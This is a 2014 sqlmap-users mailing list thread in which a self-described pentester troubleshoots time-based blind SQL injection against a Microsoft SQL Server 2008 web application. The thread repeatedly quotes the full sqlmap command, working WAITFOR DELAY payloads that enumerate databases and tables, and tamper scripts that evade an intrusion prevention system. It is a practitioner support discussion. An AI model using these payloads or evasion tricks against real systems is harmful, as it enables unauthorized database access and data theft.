sqlmap-users

[sqlmap-users] number of databases/tables problems

[floyd <flo...@ya...>]

Hi everybody

I'm doing a Pentest and I'm able to do a time based blind sql injection
on a very big database.

It takes some time, but that's fine for now. But sqlmap is failing when
it comes to retrieving the *number of [databases, tables, columns,
whatever]*:

$ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p "redactedParameter"
--user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL
--os=Windows --suffix="; --" --prefix="';" --technique=T -v 3
--time-sec=2 --proxy socks5://localhost:5050 --dbs -o
[...snip...]
[11:57:49] [INFO] confirming Microsoft SQL Server
[11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.X.XXXXX (redacted)
back-end DBMS: Microsoft SQL Server 2008
[11:57:49] [INFO] fetching database names
[11:57:49] [INFO] fetching number of databases
[11:57:49] [WARNING] multi-threading is considered unsafe in time-based
data retrieval. Going to switch it off automatically
[11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
[11:57:49] [WARNING] time-based comparison requires larger statistical
model, please wait..............................
[11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
[11:58:25] [WARNING] it is very important not to stress the network
adapter during usage of time-based payloads to prevent potential errors
[11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
[11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
[11:59:55] [INFO] retrieved:
[11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
[11:59:55] [WARNING] in case of continuous data retrieval problems you
are advised to try a switch '--no-cast' or switch '--hex'
[11:59:55] [ERROR] unable to retrieve the number of databases

However, for the *database names* sqlmap will continue with the
DB_NAME(X) technique. Right now it is dumping out all the different
database names, which works fine:

[15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109)
WAITFOR DELAY '0:0:2'; --

Because I got many of the following errors (and the occurence of the
error is random), I patched the time delay in the python code to be
fixed to 2 seconds (maybe you want to have an option for that):

[15:03:14] [ERROR] invalid character detected. retrying..
[15:03:14] [WARNING] increasing time delay to 3 seconds

That works fine and I get good results. However, when I try to dump
table names now (from one of the known databases) with the -D DB_NAME
and --tables switch, it is again failing to retrieve the number of tables:

[14:51:53] [INFO] fetching tables for database: DB_NAME
[14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
[14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66)
WAITFOR DELAY '0:0:10'; --
[14:51:53] [WARNING] time-based comparison requires larger statistical
model, please wait..............................
[14:52:26] [CRITICAL] considerable lagging has been detected in
connection response(s). Please use as high value for option '--time-sec'
as possible (e.g. 10 or more)
[14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97)
WAITFOR DELAY '0:0:10'; --
[14:52:56] [WARNING] it is very important not to stress the network
adapter during usage of time-based payloads to prevent potential errors
[14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101)
WAITFOR DELAY '0:0:10'; --
[14:54:56] [INFO] retrieved:
[14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
[...]
[14:57:27] [INFO] retrieved:
[14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
[...]
[14:59:57] [INFO] retrieved:
[14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
[14:59:57] [WARNING] unable to retrieve the number of tables for
database 'DB_NAME'
[14:59:57] [CRITICAL] unable to retrieve the tables for any database

Any suggestions? Using higher --time-sec, --hex or --no-cast didn't
help. Using --start and --stop also didn't work. I can't get any data
out of it like this.

Best regards,
floyd

Re: [sqlmap-users] number of databases/tables problems

[Miroslav S. <mir...@gm...>]

Hi.

This looks like a permission problem while reading system tables. That
would explain why DB_NAME() works and everything else fails.

Bye
On Sep 23, 2014 4:27 PM, "floyd" <flo...@ya...> wrote:

> Hi everybody
>
> I'm doing a Pentest and I'm able to do a time based blind sql injection
> on a very big database.
>
> It takes some time, but that's fine for now. But sqlmap is failing when
> it comes to retrieving the *number of [databases, tables, columns,
> whatever]*:
>
> $ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p "redactedParameter"
> --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
> Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL
> --os=Windows --suffix="; --" --prefix="';" --technique=T -v 3
> --time-sec=2 --proxy socks5://localhost:5050 --dbs -o
> [...snip...]
> [11:57:49] [INFO] confirming Microsoft SQL Server
> [11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows
> web application technology: ASP.NET, ASP.NET 2.X.XXXXX (redacted)
> back-end DBMS: Microsoft SQL Server 2008
> [11:57:49] [INFO] fetching database names
> [11:57:49] [INFO] fetching number of databases
> [11:57:49] [WARNING] multi-threading is considered unsafe in time-based
> data retrieval. Going to switch it off automatically
> [11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
> [11:57:49] [WARNING] time-based comparison requires larger statistical
> model, please wait..............................
> [11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
> [11:58:25] [WARNING] it is very important not to stress the network
> adapter during usage of time-based payloads to prevent potential errors
> [11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
> [11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
> [11:59:55] [INFO] retrieved:
> [11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
> [11:59:55] [WARNING] in case of continuous data retrieval problems you
> are advised to try a switch '--no-cast' or switch '--hex'
> [11:59:55] [ERROR] unable to retrieve the number of databases
>
> However, for the *database names* sqlmap will continue with the
> DB_NAME(X) technique. Right now it is dumping out all the different
> database names, which works fine:
>
> [15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109)
> WAITFOR DELAY '0:0:2'; --
>
> Because I got many of the following errors (and the occurence of the
> error is random), I patched the time delay in the python code to be
> fixed to 2 seconds (maybe you want to have an option for that):
>
> [15:03:14] [ERROR] invalid character detected. retrying..
> [15:03:14] [WARNING] increasing time delay to 3 seconds
>
> That works fine and I get good results. However, when I try to dump
> table names now (from one of the known databases) with the -D DB_NAME
> and --tables switch, it is again failing to retrieve the number of tables:
>
> [14:51:53] [INFO] fetching tables for database: DB_NAME
> [14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
> [14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
> NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
> WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66)
> WAITFOR DELAY '0:0:10'; --
> [14:51:53] [WARNING] time-based comparison requires larger statistical
> model, please wait..............................
> [14:52:26] [CRITICAL] considerable lagging has been detected in
> connection response(s). Please use as high value for option '--time-sec'
> as possible (e.g. 10 or more)
> [14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
> NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
> WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97)
> WAITFOR DELAY '0:0:10'; --
> [14:52:56] [WARNING] it is very important not to stress the network
> adapter during usage of time-based payloads to prevent potential errors
> [14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
> NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
> WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101)
> WAITFOR DELAY '0:0:10'; --
> [14:54:56] [INFO] retrieved:
> [14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
> [...]
> [14:57:27] [INFO] retrieved:
> [14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
> [...]
> [14:59:57] [INFO] retrieved:
> [14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
> [14:59:57] [WARNING] unable to retrieve the number of tables for
> database 'DB_NAME'
> [14:59:57] [CRITICAL] unable to retrieve the tables for any database
>
> Any suggestions? Using higher --time-sec, --hex or --no-cast didn't
> help. Using --start and --stop also didn't work. I can't get any data
> out of it like this.
>
> Best regards,
> floyd
>
>
> ------------------------------------------------------------------------------
> Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
> Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS Reports
> Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
> Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
>
> http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

Re: [sqlmap-users] number of databases/tables problems

[floyd <flo...@ya...>]

Hi Miroslav

Thanks for your time and for sqlmap. I hope you got the donation :)

By now I figured out what it was: an IPS. Had to
--tamper=caseselect,charencode where caseselect is just a simple
.replace("SELECT","sElEcT"). What a stupid IPS.

Is there any way to correct errors that sqlmap is getting? I sometimes
have an extra character at the end of table names and would like to
correct that.

And: Is there a possibility to tell sqlmap manually, which columns a
table has? That would be very helpful for blind time based, because,
well, it takes forever :)

Btw. awesome resume feature on ^C !

Best,
floyd

On 24/09/14 13:03, Miroslav Stampar wrote:
> Hi.
> 
> This looks like a permission problem while reading system tables. That
> would explain why DB_NAME() works and everything else fails.
> 
> Bye
> 
> On Sep 23, 2014 4:27 PM, "floyd" <flo...@ya...
> <mailto:flo...@ya...>> wrote:
> 
>     Hi everybody
> 
>     I'm doing a Pentest and I'm able to do a time based blind sql injection
>     on a very big database.
> 
>     It takes some time, but that's fine for now. But sqlmap is failing when
>     it comes to retrieving the *number of [databases, tables, columns,
>     whatever]*:
> 
>     $ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p "redactedParameter"
>     --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
>     Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL
>     --os=Windows --suffix="; --" --prefix="';" --technique=T -v 3
>     --time-sec=2 --proxy socks5://localhost:5050 --dbs -o
>     [...snip...]
>     [11:57:49] [INFO] confirming Microsoft SQL Server
>     [11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
>     web server operating system: Windows
>     web application technology: ASP.NET <http://ASP.NET>, ASP.NET
>     <http://ASP.NET> 2.X.XXXXX (redacted)
>     back-end DBMS: Microsoft SQL Server 2008
>     [11:57:49] [INFO] fetching database names
>     [11:57:49] [INFO] fetching number of databases
>     [11:57:49] [WARNING] multi-threading is considered unsafe in time-based
>     data retrieval. Going to switch it off automatically
>     [11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
>     master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
>     [11:57:49] [WARNING] time-based comparison requires larger statistical
>     model, please wait..............................
>     [11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
>     master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
>     [11:58:25] [WARNING] it is very important not to stress the network
>     adapter during usage of time-based payloads to prevent potential errors
>     [11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
>     master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
>     [11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
>     master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
>     [11:59:55] [INFO] retrieved:
>     [11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
>     [11:59:55] [WARNING] in case of continuous data retrieval problems you
>     are advised to try a switch '--no-cast' or switch '--hex'
>     [11:59:55] [ERROR] unable to retrieve the number of databases
> 
>     However, for the *database names* sqlmap will continue with the
>     DB_NAME(X) technique. Right now it is dumping out all the different
>     database names, which works fine:
> 
>     [15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>     ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109)
>     WAITFOR DELAY '0:0:2'; --
> 
>     Because I got many of the following errors (and the occurence of the
>     error is random), I patched the time delay in the python code to be
>     fixed to 2 seconds (maybe you want to have an option for that):
> 
>     [15:03:14] [ERROR] invalid character detected. retrying..
>     [15:03:14] [WARNING] increasing time delay to 3 seconds
> 
>     That works fine and I get good results. However, when I try to dump
>     table names now (from one of the known databases) with the -D DB_NAME
>     and --tables switch, it is again failing to retrieve the number of
>     tables:
> 
>     [14:51:53] [INFO] fetching tables for database: DB_NAME
>     [14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
>     [14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>     master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
>     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
>     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66)
>     WAITFOR DELAY '0:0:10'; --
>     [14:51:53] [WARNING] time-based comparison requires larger statistical
>     model, please wait..............................
>     [14:52:26] [CRITICAL] considerable lagging has been detected in
>     connection response(s). Please use as high value for option '--time-sec'
>     as possible (e.g. 10 or more)
>     [14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>     master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
>     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
>     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97)
>     WAITFOR DELAY '0:0:10'; --
>     [14:52:56] [WARNING] it is very important not to stress the network
>     adapter during usage of time-based payloads to prevent potential errors
>     [14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>     master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
>     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
>     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101)
>     WAITFOR DELAY '0:0:10'; --
>     [14:54:56] [INFO] retrieved:
>     [14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
>     [...]
>     [14:57:27] [INFO] retrieved:
>     [14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
>     [...]
>     [14:59:57] [INFO] retrieved:
>     [14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
>     [14:59:57] [WARNING] unable to retrieve the number of tables for
>     database 'DB_NAME'
>     [14:59:57] [CRITICAL] unable to retrieve the tables for any database
> 
>     Any suggestions? Using higher --time-sec, --hex or --no-cast didn't
>     help. Using --start and --stop also didn't work. I can't get any data
>     out of it like this.
> 
>     Best regards,
>     floyd
> 
>     ------------------------------------------------------------------------------
>     Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
>     Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS Reports
>     Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
>     Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
>     http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
>     _______________________________________________
>     sqlmap-users mailing list
>     sql...@li...
>     <mailto:sql...@li...>
>     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> 

Re: [sqlmap-users] number of databases/tables problems

[Rodrigo Z. S. <rod...@gm...>]

well, about the column, it is possible, I think, use the

>     -D DB               DBMS database to enumerate
>     -T TBL              DBMS database table(s) to enumerate
>     -C COL              DBMS database table column(s) to enumerate
>     -X EXCLUDECOL       DBMS database table column(s) to not enumerate
>     -U USER             DBMS user to enumerate

I really think the -C will search your column. There are a brutal force for
common column (or was table?) Anyway, set your colum and it will accept.

2014-09-25 10:17 GMT-03:00 floyd <flo...@ya...>:

> Hi Miroslav
>
> Thanks for your time and for sqlmap. I hope you got the donation :)
>
> By now I figured out what it was: an IPS. Had to
> --tamper=caseselect,charencode where caseselect is just a simple
> .replace("SELECT","sElEcT"). What a stupid IPS.
>
> Is there any way to correct errors that sqlmap is getting? I sometimes
> have an extra character at the end of table names and would like to
> correct that.
>
> And: Is there a possibility to tell sqlmap manually, which columns a
> table has? That would be very helpful for blind time based, because,
> well, it takes forever :)
>
> Btw. awesome resume feature on ^C !
>
> Best,
> floyd
>
> On 24/09/14 13:03, Miroslav Stampar wrote:
> > Hi.
> >
> > This looks like a permission problem while reading system tables. That
> > would explain why DB_NAME() works and everything else fails.
> >
> > Bye
> >
> > On Sep 23, 2014 4:27 PM, "floyd" <flo...@ya...
> > <mailto:flo...@ya...>> wrote:
> >
> >     Hi everybody
> >
> >     I'm doing a Pentest and I'm able to do a time based blind sql
> injection
> >     on a very big database.
> >
> >     It takes some time, but that's fine for now. But sqlmap is failing
> when
> >     it comes to retrieving the *number of [databases, tables, columns,
> >     whatever]*:
> >
> >     $ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p
> "redactedParameter"
> >     --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
> >     Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL
> >     --os=Windows --suffix="; --" --prefix="';" --technique=T -v 3
> >     --time-sec=2 --proxy socks5://localhost:5050 --dbs -o
> >     [...snip...]
> >     [11:57:49] [INFO] confirming Microsoft SQL Server
> >     [11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
> >     web server operating system: Windows
> >     web application technology: ASP.NET <http://ASP.NET>, ASP.NET
> >     <http://ASP.NET> 2.X.XXXXX (redacted)
> >     back-end DBMS: Microsoft SQL Server 2008
> >     [11:57:49] [INFO] fetching database names
> >     [11:57:49] [INFO] fetching number of databases
> >     [11:57:49] [WARNING] multi-threading is considered unsafe in
> time-based
> >     data retrieval. Going to switch it off automatically
> >     [11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> >     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> >     master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
> >     [11:57:49] [WARNING] time-based comparison requires larger
> statistical
> >     model, please wait..............................
> >     [11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> >     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> >     master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
> >     [11:58:25] [WARNING] it is very important not to stress the network
> >     adapter during usage of time-based payloads to prevent potential
> errors
> >     [11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> >     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> >     master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
> >     [11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> >     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> >     master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
> >     [11:59:55] [INFO] retrieved:
> >     [11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
> >     [11:59:55] [WARNING] in case of continuous data retrieval problems
> you
> >     are advised to try a switch '--no-cast' or switch '--hex'
> >     [11:59:55] [ERROR] unable to retrieve the number of databases
> >
> >     However, for the *database names* sqlmap will continue with the
> >     DB_NAME(X) technique. Right now it is dumping out all the different
> >     database names, which works fine:
> >
> >     [15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> >     ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109)
> >     WAITFOR DELAY '0:0:2'; --
> >
> >     Because I got many of the following errors (and the occurence of the
> >     error is random), I patched the time delay in the python code to be
> >     fixed to 2 seconds (maybe you want to have an option for that):
> >
> >     [15:03:14] [ERROR] invalid character detected. retrying..
> >     [15:03:14] [WARNING] increasing time delay to 3 seconds
> >
> >     That works fine and I get good results. However, when I try to dump
> >     table names now (from one of the known databases) with the -D DB_NAME
> >     and --tables switch, it is again failing to retrieve the number of
> >     tables:
> >
> >     [14:51:53] [INFO] fetching tables for database: DB_NAME
> >     [14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
> >     [14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> >
>  master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
> >     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM
> DB_NAME..sysobjects
> >     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66)
> >     WAITFOR DELAY '0:0:10'; --
> >     [14:51:53] [WARNING] time-based comparison requires larger
> statistical
> >     model, please wait..............................
> >     [14:52:26] [CRITICAL] considerable lagging has been detected in
> >     connection response(s). Please use as high value for option
> '--time-sec'
> >     as possible (e.g. 10 or more)
> >     [14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> >
>  master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
> >     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM
> DB_NAME..sysobjects
> >     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97)
> >     WAITFOR DELAY '0:0:10'; --
> >     [14:52:56] [WARNING] it is very important not to stress the network
> >     adapter during usage of time-based payloads to prevent potential
> errors
> >     [14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> >
>  master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
> >     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM
> DB_NAME..sysobjects
> >     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101)
> >     WAITFOR DELAY '0:0:10'; --
> >     [14:54:56] [INFO] retrieved:
> >     [14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
> >     [...]
> >     [14:57:27] [INFO] retrieved:
> >     [14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
> >     [...]
> >     [14:59:57] [INFO] retrieved:
> >     [14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
> >     [14:59:57] [WARNING] unable to retrieve the number of tables for
> >     database 'DB_NAME'
> >     [14:59:57] [CRITICAL] unable to retrieve the tables for any database
> >
> >     Any suggestions? Using higher --time-sec, --hex or --no-cast didn't
> >     help. Using --start and --stop also didn't work. I can't get any data
> >     out of it like this.
> >
> >     Best regards,
> >     floyd
> >
> >
>  ------------------------------------------------------------------------------
> >     Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
> >     Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS
> Reports
> >     Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
> >     Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
> >
> http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
> >     _______________________________________________
> >     sqlmap-users mailing list
> >     sql...@li...
> >     <mailto:sql...@li...>
> >     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
>
>
>
> ------------------------------------------------------------------------------
> Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
> Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS Reports
> Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
> Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
>
> http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

Re: [sqlmap-users] number of databases/tables problems

[Miroslav S. <mir...@gm...>]

As Rodrigo stated correctly, you can use -C to specify column names
manually.

For forcing sqlmap to requery certain results you can use --fresh-queries.

Bye

p.s. thx for donation :)
p.p.s. I am glad that you managed to use tamper scripts to bypass IPS/WAF
On Sep 25, 2014 8:04 PM, "Rodrigo Zanatta Silva" <
rod...@gm...> wrote:

> well, about the column, it is possible, I think, use the
>
>>     -D DB               DBMS database to enumerate
>>     -T TBL              DBMS database table(s) to enumerate
>>     -C COL              DBMS database table column(s) to enumerate
>>     -X EXCLUDECOL       DBMS database table column(s) to not enumerate
>>     -U USER             DBMS user to enumerate
>
> I really think the -C will search your column. There are a brutal force
> for common column (or was table?) Anyway, set your colum and it will
> accept.
>
> 2014-09-25 10:17 GMT-03:00 floyd <flo...@ya...>:
>
>> Hi Miroslav
>>
>> Thanks for your time and for sqlmap. I hope you got the donation :)
>>
>> By now I figured out what it was: an IPS. Had to
>> --tamper=caseselect,charencode where caseselect is just a simple
>> .replace("SELECT","sElEcT"). What a stupid IPS.
>>
>> Is there any way to correct errors that sqlmap is getting? I sometimes
>> have an extra character at the end of table names and would like to
>> correct that.
>>
>> And: Is there a possibility to tell sqlmap manually, which columns a
>> table has? That would be very helpful for blind time based, because,
>> well, it takes forever :)
>>
>> Btw. awesome resume feature on ^C !
>>
>> Best,
>> floyd
>>
>> On 24/09/14 13:03, Miroslav Stampar wrote:
>> > Hi.
>> >
>> > This looks like a permission problem while reading system tables. That
>> > would explain why DB_NAME() works and everything else fails.
>> >
>> > Bye
>> >
>> > On Sep 23, 2014 4:27 PM, "floyd" <flo...@ya...
>> > <mailto:flo...@ya...>> wrote:
>> >
>> >     Hi everybody
>> >
>> >     I'm doing a Pentest and I'm able to do a time based blind sql
>> injection
>> >     on a very big database.
>> >
>> >     It takes some time, but that's fine for now. But sqlmap is failing
>> when
>> >     it comes to retrieving the *number of [databases, tables, columns,
>> >     whatever]*:
>> >
>> >     $ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p
>> "redactedParameter"
